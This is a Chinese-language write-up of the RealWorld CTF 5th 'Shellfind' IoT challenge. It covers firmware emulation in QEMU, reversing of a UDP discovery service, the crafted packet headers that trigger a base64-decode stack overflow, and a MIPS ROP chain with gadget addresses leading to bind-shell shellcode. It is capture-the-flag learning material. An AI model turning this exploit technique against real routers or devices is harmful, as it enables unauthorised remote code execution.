RWCTF 5th Shellfind復現
前言
RealWorld CTF 5th 里的一道iot-pwn,根據真實設備固件改編而成,覺得題目貼近iot實戰且很有意思,故在此記錄一下復現過程。
題目分析
題目描述
Hello Hacker. You don't know me, but I know you. I want to play a game. Here's what happens if you lose. The device you are watching is hooked into your Saturday and Sunday. When the timer in the back goes off, your curiosity will be permanently ripped open. Think of it like a reverse bear trap. Here, I'll show you. There is only one UDP service to shell the device. It's in the stomach of your cold firmware. Look around Hacker. Know that I'm not lying. Better hurry up. Shell or out, make your choice.
從中可以看出漏洞大概率存在于UDP服務中。
固件分析
拿到手的是一個bin包,解壓出來可以得到一個完整的文件系統。相比于常規pwn題單一的二進制而言,我們首先要做的是尋找漏洞文件。既然是真實設備改編那我們就可以先在網上找一找官方固件并嘗試下載最新版本。
下載到官方的固件后,可以采取bindiff等方法去找被修改過的二進制文件。可以初步判定漏洞應該是出在ipfind程序中。
并且發現此固件為mips大端,且可疑漏洞文件沒開保護。
固件模擬
我是直接用qemu去模擬的這個固件,當然也可以嘗試用FirmAE,firmadyne,firmware-analysis-plus等工具去進行模擬。我的qemu啟動腳本如下:
sudo ifconfig ens33 down sudo brctl addbr br0 sudo brctl addif br0 ens33 sudo ifconfig br0 0.0.0.0 promisc up sudo ifconfig ens33 0.0.0.0 promisc up sudo dhclient br0 sudo tunctl -t tap0 sudo brctl addif br0 tap0 sudo ifconfig tap0 0.0.0.0 promisc up sudo qemu-system-mips \ -M malta -kernel vmlinux-3.2.0-4-4kc-malta \ -hda debian_wheezy_mips_standard.qcow2 \ -append "root=/dev/sda1 console=tty0" \ -net nic,macaddr=00:16:3e:00:00:01 \ -net tap,ifname=tap0,script=no,downscript=no \ -nographic
啟動完成之后用scp把固件包、gdbserver、完整的busybox等傳上去。之后用如下命令切換到固件包根目錄進行操作:
mount -t proc /proc ./squashfs-root/proc mount -o bind /dev ./squashfs-root/dev chroot ./squashfs-root/ sh
之后通過/etc/rc.d/rcS初始化服務。
啟動完成之后通過./busybox-mips netstat -pantu去查看開放的端口及對應的二進制文件。
可以看到我們之前分析的可疑文件ipfind正是UDP服務,開放端口為62720。
值得注意的是我們用ps去查看進程發現執行的是/usr/sbin/ipfind br0這個命令,但我qemu的有效網卡是eth0,這樣以后我們會發現無法使用gdbserver進行調試,故我們要殺死該進程,并執行/usr/sbin/ipfind eth0 &,這樣我們就可以使用gdbserver進行愉快的調試了。
漏洞文件分析
首先是建立socket通信并綁定到62720端口,與剛才看到的端口一致。
接著從client端接收數據,并進行一系列的操作。之后會對數據進行一個判斷,以此來確定是否進入sub_40172C函數或sub_4013F4函數。
sub_40172C函數
想進入這個函數我們可以逆出來它所需接受的內容開頭應該為:
header1 = b"FIVI" header1+= b"\x00\x00\x00\x00" header1+= b"\x0A\x01\x00\x00" header1+= b"\x00\x00\x00\x00" header1+= b"\x00" header1+= b"\xFF\xFF\xFF\xFF\xFF\xFF" header1+= b"\x00\x00" header1+= b"\x00\x00\x00\x00"
這個函數會調用sub_400E50得到net_get_hwaddr(ifname, a1 + 17),實際上就是mac addr(qemu啟動時可以進行設置,之后打印出來對比一下即可),并把它發送到client端。這個值對于我們進入第二個函數必不可少。
sub_4013F4函數
想進入這個函數我們可以逆出來它所需接受的內容開頭應該為:
header2 = b"FIVI" header2+= b"\x00\x00\x00\x00" header2+= b"\x0A\x02\x00\x00" header2+= b"\x00\x00\x00\x00" header2+= b"\x00" header2+= mac header2+= b"\x00\x00" header2+= b"\x8E\x00\x00\x00"
進入這個函數后,我們即可找到我們的漏洞函數sub_400F50,這個函數有兩次base64 decode,第二次解碼時會發生緩沖區溢出。
漏洞利用
因為沒開保護,我們布置好rop跳到shellcode上即可。但是我們由于沒有libc地址,我們需要花費一定時間在ipfind這個文件里去找gadgets進行利用。
我們想要跳轉到shellcode上執行,那么我們就需要可以泄露棧地址的gadget,于是我們找到了如下的gadget來泄露棧地址:
.text:004013D0 sub_4013D0: # CODE XREF: sub_4013F4+9C↓p .text:004013D0 # sub_4013F4+160↓p ... .text:004013D0 .text:004013D0 var_8 = -8 .text:004013D0 arg_4 = 4 .text:004013D0 arg_8 = 8 .text:004013D0 arg_C = 0xC .text:004013D0 .text:004013D0 addiu $sp, -0x10 .text:004013D4 sw $a1, 0x10+arg_4($sp) .text:004013D8 sw $a2, 0x10+arg_8($sp) .text:004013DC sw $a3, 0x10+arg_C($sp) .text:004013E0 addiu $v0, $sp, 0x10+arg_4 .text:004013E4 sw $v0, 0x10+var_8($sp) .text:004013E8 addiu $sp, 0x10 .text:004013EC jr $ra .text:004013F0 nop
這個gadget可以控制v0為棧地址,我們向上交叉引用找到一個既能控制ra又不改變v0的gadget下:
.text:00401F98 jal sub_4013D0 .text:00401F9C li $a0, aCanTGetHelloSo # "Can't get hello socket" .text:00401FA0 b loc_4020B4 .text:00401FA4 nop .text:004020B4 loc_4020B4: # CODE XREF: sub_401DF4+1AC↑j .text:004020B4 # sub_401DF4+238↑j ... .text:004020B4 lw $ra, 0x7C+var_s8($sp) .text:004020B8 lw $s1, 0x7C+var_s4($sp) .text:004020BC lw $s0, 0x7C+var_s0($sp) .text:004020C0 jr $ra .text:004020C4 addiu $sp, 0x88
但是在走這條gadget之前我們得先恢復gp寄存器,并且還要考慮到a1,a2,a3寄存器對棧的影響,最好可以控制為nop指令,以免對剛才泄露出來的棧地址上指令造成影響。
.text:00401218 lw $gp, 0x9C+var_8C($sp) .text:0040121C la $t9, close .text:00401220 jalr $t9 ; close .text:00401224 move $a0, $s0 # fd .text:00401228 move $v0, $zero .text:0040122C .text:0040122C loc_40122C: # CODE XREF: sub_401120+80↑j .text:0040122C # sub_401120+A0↑j .text:0040122C lw $ra, 0x9C+var_s8($sp) .text:00401230 lw $s1, 0x9C+var_s4($sp) .text:00401234 lw $s0, 0x9C+var_s0($sp) .text:00401238 jr $ra .text:0040123C addiu $sp, 0xA8
接著可以找到如下gadget使得可以跳轉到S0寄存器存指向的地址中:
.text:004027C0 loc_4027C0: # CODE XREF: sub_402790+3C↓j .text:004027C0 jalr $t9 .text:004027C4 nop .text:004027C8 .text:004027C8 loc_4027C8: # CODE XREF: sub_402790+28↑j .text:004027C8 lw $t9, 0($s0) .text:004027CC bne $t9, $s1, loc_4027C0 .text:004027D0 addiu $s0, -4 .text:004027D4 lw $ra, 0x1C+var_s8($sp) .text:004027D8 lw $s1, 0x1C+var_s4($sp) .text:004027DC lw $s0, 0x1C+var_s0($sp) .text:004027E0 jr $ra .text:004027E4 addiu $sp, 0x28
最后找一個可以把v0賦給任意地址,并且可以控制s0的gadget即可:
.text:00400F28 sw $v0, 0xD($s0) .text:00400F2C .text:00400F2C loc_400F2C: # CODE XREF: sub_400E50+CC↑j .text:00400F2C la $v0, ifname .text:00400F30 lw $a0, (ifname - 0x413138)($v0) .text:00400F34 la $t9, net_get_hwaddr .text:00400F38 jalr $t9 ; net_get_hwaddr .text:00400F3C addiu $a1, $s0, 0x11 .text:00400F40 lw $ra, 0x20+var_s4($sp) .text:00400F44 lw $s0, 0x20+var_s0($sp) .text:00400F48 jr $ra .text:00400F4C addiu $sp, 0x28
最后跟上一個udp_bind_shell的shellcode即可。布置完rop經過調試可知我們還需要寫一個短跳轉指令我用的短跳轉指令是"\x10\x00\x00\x30" # b 0xC4,使得我們能夠從泄露的棧地址跳轉到我們的shellcode處。
exploit效果
完整exploit見:https://github.com/fxc233/CTF/blob/main/IOT/RealWorldCTF-5th-ShellFind/exp.py
